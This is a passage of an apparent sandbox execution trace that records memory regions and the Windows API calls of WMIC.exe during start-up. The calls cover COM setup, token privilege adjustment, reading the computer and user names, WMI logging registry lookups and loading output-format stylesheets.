0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 2021 start_va = 0xcd0000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 2022 start_va = 0xe10000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 2023 start_va = 0x5c0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2024 start_va = 0xbd0000 end_va = 0xc7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 2025 start_va = 0xcc0000 end_va = 0xccffff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 2026 start_va = 0xcd0000 end_va = 0xdaefff entry_point = 0xcd0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2027 start_va = 0xe00000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 2028 start_va = 0x5370000 end_va = 0x576ffff entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 2029 start_va = 0x5c0000 end_va = 0x5c0fff entry_point = 0x5c0000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 2030 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2031 start_va = 0x7e0000 end_va = 0x7fffff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 2032 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2033 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2034 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 2035 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2036 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2037 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2038 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2039 start_va = 0x800000 end_va = 0x829fff entry_point = 0x800000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2040 start_va = 0xe10000 end_va = 0xf97fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e10000" filename = "" Region: id = 2041 start_va = 0xfe0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 2042 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2043 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2044 start_va = 0x800000 end_va = 0x80ffff entry_point = 0x800000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 2045 start_va = 0xff0000 end_va = 0x1170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ff0000" filename = "" Region: id = 2046 start_va = 0x5770000 end_va = 0x6b6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005770000" filename = "" Region: id = 2047 start_va = 0x810000 end_va = 0x810fff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 2048 start_va = 0x820000 end_va = 0x820fff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 2049 start_va = 0x741c0000 end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 2050 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2051 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2052 start_va = 0x6b70000 end_va = 0x6d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000006b70000" filename = "" Region: id = 2053 start_va = 0x830000 end_va = 0x830fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 2054 start_va = 0x1180000 end_va = 0x1237fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 2055 start_va = 0x830000 end_va = 0x833fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 2056 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2057 start_va = 0x6b70000 end_va = 0x6c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000006b70000" filename = "" Region: id = 2058 start_va = 0x6d20000 end_va = 0x6d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000006d20000" filename = "" Region: id = 2059 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2060 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2061 start_va = 0x840000 end_va = 0x87ffff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 2062 start_va = 0xbd0000 end_va = 0xc0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 2063 start_va = 0xc10000 end_va = 0xc4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 2064 start_va = 0xc70000 end_va = 0xc7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 2065 start_va = 0xc80000 end_va = 0xcbffff entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 2066 start_va = 0xdb0000 end_va = 0xdeffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 2067 start_va = 0xfa0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 2068 start_va = 0x7f567000 end_va = 0x7f569fff entry_point = 0x0 region_type = private name = "private_0x000000007f567000" filename = "" Region: id = 2069 start_va = 0x7f56a000 end_va = 0x7f56cfff entry_point = 0x0 region_type = private name = "private_0x000000007f56a000" filename = "" Region: id = 2070 start_va = 0x7f56d000 end_va = 0x7f56ffff entry_point = 0x0 region_type = private name = "private_0x000000007f56d000" filename = "" Region: id = 2079 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 2080 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 2081 start_va = 0xc50000 end_va = 0xc64fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c50000" filename = "" Region: id = 2082 start_va = 0x1240000 end_va = 0x1268fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 157 os_tid = 0xcc8 [0105.535] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0105.535] __set_app_type (_Type=0x1) [0105.535] __p__fmode () returned 0x77ac4d6c [0105.535] __p__commode () returned 0x77ac5b1c [0105.535] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0105.536] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0105.536] ??0CHString@@QAE@XZ () returned 0x13495ec [0105.536] ??0CHString@@QAE@XZ () returned 0x13498fc [0105.536] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0105.536] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0105.536] _onexit (_Func=0x1340a20) returned 0x1340a20 [0105.536] _onexit (_Func=0x1340a30) returned 0x1340a30 [0105.536] _onexit (_Func=0x1340a50) returned 0x1340a50 [0105.536] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0105.536] ResolveDelayLoadedAPI () returned 0x770fcd50 [0105.537] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0105.538] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0105.543] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0x5e0500) returned 0x0 [0105.553] GetCurrentProcess () returned 0xffffffff [0105.553] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x51f868 | out: TokenHandle=0x51f868*=0x158) returned 1 [0105.553] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x51f864 | out: TokenInformation=0x0, ReturnLength=0x51f864) returned 0 [0105.553] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x883a08, TokenInformationLength=0x118, ReturnLength=0x51f864 | out: TokenInformation=0x883a08, ReturnLength=0x51f864) returned 1 [0105.553] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0x883a08*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0105.553] CloseHandle (hObject=0x158) returned 1 [0105.553] SetThreadUILanguage (LangId=0x0) returned 0x409 [0105.555] _vsnwprintf (in: _Buffer=0x883a98, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x51f7f0 | out: _Buffer="ms_409") returned 6 [0105.555] GetComputerNameW (in: lpBuffer=0x883ae0, nSize=0x51f854 | out: lpBuffer="LHNIWSJ", nSize=0x51f854) returned 1 [0105.555] lstrlenW (lpString="LHNIWSJ") returned 7 [0105.555] lstrlenW (lpString="LHNIWSJ") returned 7 [0105.556] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0105.556] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x51f868 | out: lpNameBuffer=0x0, nSize=0x51f868) returned 0x0 [0105.556] GetLastError () returned 0xea [0105.556] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x883b20, nSize=0x51f868 | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0x51f868) returned 0x1 [0105.557] lstrlenW (lpString="") returned 0 [0105.557] lstrlenW (lpString="LHNIWSJ") returned 7 [0105.557] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0105.558] lstrlenW (lpString=".") returned 1 [0105.558] lstrlenW (lpString="LHNIWSJ") returned 7 [0105.558] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0105.558] lstrlenW (lpString="LOCALHOST") returned 9 [0105.558] lstrlenW (lpString="LHNIWSJ") returned 7 [0105.558] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0105.558] lstrlenW (lpString="LHNIWSJ") returned 7 [0105.558] lstrlenW (lpString="LHNIWSJ") returned 7 [0105.558] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0105.558] lstrlenW (lpString="LHNIWSJ") returned 7 [0105.558] lstrlenW (lpString="LHNIWSJ") returned 7 [0105.558] lstrlenW (lpString="LHNIWSJ") returned 7 [0105.558] lstrlenW (lpString="LHNIWSJ") returned 7 [0105.558] ResolveDelayLoadedAPI () returned 0x77bb9840 [0105.560] SysStringLen (param_1="IDENTIFY") returned 0x8 [0105.560] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0105.560] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0105.560] SysStringLen (param_1="IDENTIFY") returned 0x8 [0105.560] SysStringLen (param_1="IMPERSONATE") returned 0xb [0105.560] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0105.560] SysStringLen (param_1="IMPERSONATE") returned 0xb [0105.560] SysStringLen (param_1="IDENTIFY") returned 0x8 [0105.560] SysStringLen (param_1="IDENTIFY") returned 0x8 [0105.560] SysStringLen (param_1="IMPERSONATE") returned 0xb [0105.560] SysStringLen (param_1="DELEGATE") returned 0x8 [0105.560] SysStringLen (param_1="IDENTIFY") returned 0x8 [0105.560] SysStringLen (param_1="DELEGATE") returned 0x8 [0105.560] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0105.560] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0105.560] SysStringLen (param_1="DELEGATE") returned 0x8 [0105.560] SysStringLen (param_1="NONE") returned 0x4 [0105.560] SysStringLen (param_1="DEFAULT") returned 0x7 [0105.560] SysStringLen (param_1="DEFAULT") returned 0x7 [0105.560] SysStringLen (param_1="NONE") returned 0x4 [0105.561] SysStringLen (param_1="CONNECT") returned 0x7 [0105.561] SysStringLen (param_1="DEFAULT") returned 0x7 [0105.561] SysStringLen (param_1="CALL") returned 0x4 [0105.561] SysStringLen (param_1="DEFAULT") returned 0x7 [0105.561] SysStringLen (param_1="CALL") returned 0x4 [0105.561] SysStringLen (param_1="CONNECT") returned 0x7 [0105.561] SysStringLen (param_1="PKT") returned 0x3 [0105.561] SysStringLen (param_1="DEFAULT") returned 0x7 [0105.561] SysStringLen (param_1="PKT") returned 0x3 [0105.561] SysStringLen (param_1="NONE") returned 0x4 [0105.561] SysStringLen (param_1="NONE") returned 0x4 [0105.561] SysStringLen (param_1="PKT") returned 0x3 [0105.561] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0105.561] SysStringLen (param_1="DEFAULT") returned 0x7 [0105.561] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0105.561] SysStringLen (param_1="NONE") returned 0x4 [0105.561] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0105.561] SysStringLen (param_1="PKT") returned 0x3 [0105.561] SysStringLen (param_1="PKT") returned 0x3 [0105.561] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0105.561] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0105.561] SysStringLen (param_1="DEFAULT") returned 0x7 [0105.561] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0105.561] SysStringLen (param_1="PKT") returned 0x3 [0105.561] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0105.561] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0105.561] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0105.561] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0105.562] GetSystemDirectoryW (in: lpBuffer=0x8829d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.562] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0105.562] SysStringLen (param_1="\\wbem\\") returned 0x6 [0105.562] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0105.562] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0105.562] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0105.562] GetCurrentThreadId () returned 0xcc8 [0105.562] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x51f378 | out: phkResult=0x51f378*=0x164) returned 0x0 [0105.562] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x51f384, lpcbData=0x51f380*=0x400 | out: lpType=0x0, lpData=0x51f384*=0x30, lpcbData=0x51f380*=0x4) returned 0x0 [0105.562] _wcsicmp (_String1="0", _String2="1") returned -1 [0105.562] _wcsicmp (_String1="0", _String2="2") returned -2 [0105.562] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x51f380*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x51f380*=0x42) returned 0x0 [0105.562] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x882be0, lpcbData=0x51f380*=0x42 | out: lpType=0x0, lpData=0x882be0*=0x25, lpcbData=0x51f380*=0x42) returned 0x0 [0105.562] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0105.562] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0105.562] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x51f384, lpcbData=0x51f380*=0x400 | out: lpType=0x0, lpData=0x51f384*=0x36, lpcbData=0x51f380*=0xc) returned 0x0 [0105.562] _wtol (_String="65536") returned 65536 [0105.562] RegCloseKey (hKey=0x0) returned 0x6 [0105.562] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x51f818 | out: ppv=0x51f818*=0xcc45a8) returned 0x0 [0105.571] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0xcc45a8, xmlSource=0x51f798*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x51f7fc | out: isSuccessful=0x51f7fc*=0xffff) returned 0x0 [0105.622] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0xcc45a8, DOMElement=0x51f810 | out: DOMElement=0x51f810) returned 0x0 [0105.623] SysStringLen (param_1="VALUE") returned 0x5 [0105.623] SysStringLen (param_1="TABLE") returned 0x5 [0105.623] SysStringLen (param_1="TABLE") returned 0x5 [0105.623] SysStringLen (param_1="VALUE") returned 0x5 [0105.623] SysStringLen (param_1="LIST") returned 0x4 [0105.623] SysStringLen (param_1="TABLE") returned 0x5 [0105.624] SysStringLen (param_1="RAWXML") returned 0x6 [0105.624] SysStringLen (param_1="TABLE") returned 0x5 [0105.624] SysStringLen (param_1="RAWXML") returned 0x6 [0105.624] SysStringLen (param_1="LIST") returned 0x4 [0105.624] SysStringLen (param_1="LIST") returned 0x4 [0105.624] SysStringLen (param_1="RAWXML") returned 0x6 [0105.624] SysStringLen (param_1="HTABLE") returned 0x6 [0105.624] SysStringLen (param_1="TABLE") returned 0x5 [0105.624] SysStringLen (param_1="HTABLE") returned 0x6 [0105.624] SysStringLen (param_1="LIST") returned 0x4 [0105.625] SysStringLen (param_1="HFORM") returned 0x5 [0105.625] SysStringLen (param_1="TABLE") returned 0x5 [0105.625] SysStringLen (param_1="HFORM") returned 0x5 [0105.625] SysStringLen (param_1="LIST") returned 0x4 [0105.625] SysStringLen (param_1="HFORM") returned 0x5 [0105.625] SysStringLen (param_1="HTABLE") returned 0x6 [0105.625] SysStringLen (param_1="XML") returned 0x3 [0105.625] SysStringLen (param_1="TABLE") returned 0x5 [0105.625] SysStringLen (param_1="XML") returned 0x3 [0105.625] SysStringLen (param_1="VALUE") returned 0x5 [0105.625] SysStringLen (param_1="VALUE") returned 0x5 [0105.625] SysStringLen (param_1="XML") returned 0x3 [0105.625] SysStringLen (param_1="MOF") returned 0x3 [0105.626] SysStringLen (param_1="TABLE") returned 0x5 [0105.626] SysStringLen (param_1="MOF") returned 0x3 [0105.626] SysStringLen (param_1="LIST") returned 0x4 [0105.626] SysStringLen (param_1="MOF") returned 0x3 [0105.626] SysStringLen (param_1="RAWXML") returned 0x6 [0105.626] SysStringLen (param_1="LIST") returned 0x4 [0105.626] SysStringLen (param_1="MOF") returned 0x3 [0105.626] SysStringLen (param_1="CSV") returned 0x3 [0105.626] SysStringLen (param_1="TABLE") returned 0x5 [0105.626] SysStringLen (param_1="CSV") returned 0x3 [0105.626] SysStringLen (param_1="LIST") returned 0x4 [0105.626] SysStringLen (param_1="CSV") returned 0x3 [0105.626] SysStringLen (param_1="HTABLE") returned 0x6 [0105.626] SysStringLen (param_1="CSV") returned 0x3 [0105.626] SysStringLen (param_1="HFORM") returned 0x5 [0105.627] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.627] SysStringLen (param_1="TABLE") returned 0x5 [0105.627] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.627] SysStringLen (param_1="VALUE") returned 0x5 [0105.627] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.627] SysStringLen (param_1="XML") returned 0x3 [0105.627] SysStringLen (param_1="XML") returned 0x3 [0105.627] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.627] SysStringLen (param_1="texttablewsys") returned 0xd [0105.627] SysStringLen (param_1="TABLE") returned 0x5 [0105.627] SysStringLen (param_1="texttablewsys") returned 0xd [0105.627] SysStringLen (param_1="XML") returned 0x3 [0105.627] SysStringLen (param_1="texttablewsys") returned 0xd [0105.627] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.627] SysStringLen (param_1="XML") returned 0x3 [0105.627] SysStringLen (param_1="texttablewsys") returned 0xd [0105.628] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.628] SysStringLen (param_1="TABLE") returned 0x5 [0105.628] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.628] SysStringLen (param_1="XML") returned 0x3 [0105.628] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.628] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.628] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.628] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.629] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0105.629] SysStringLen (param_1="TABLE") returned 0x5 [0105.629] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0105.629] SysStringLen (param_1="XML") returned 0x3 [0105.629] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0105.629] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.629] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0105.629] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.629] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.629] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0105.629] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.629] SysStringLen (param_1="TABLE") returned 0x5 [0105.629] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.629] SysStringLen (param_1="XML") returned 0x3 [0105.629] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.629] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.629] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.629] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.629] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.629] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.630] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0105.630] SysStringLen (param_1="TABLE") returned 0x5 [0105.630] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0105.630] SysStringLen (param_1="XML") returned 0x3 [0105.630] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0105.630] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.630] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0105.630] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.630] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0105.630] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0105.630] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.630] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0105.630] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0105.630] SysStringLen (param_1="TABLE") returned 0x5 [0105.630] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0105.630] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.630] SysStringLen 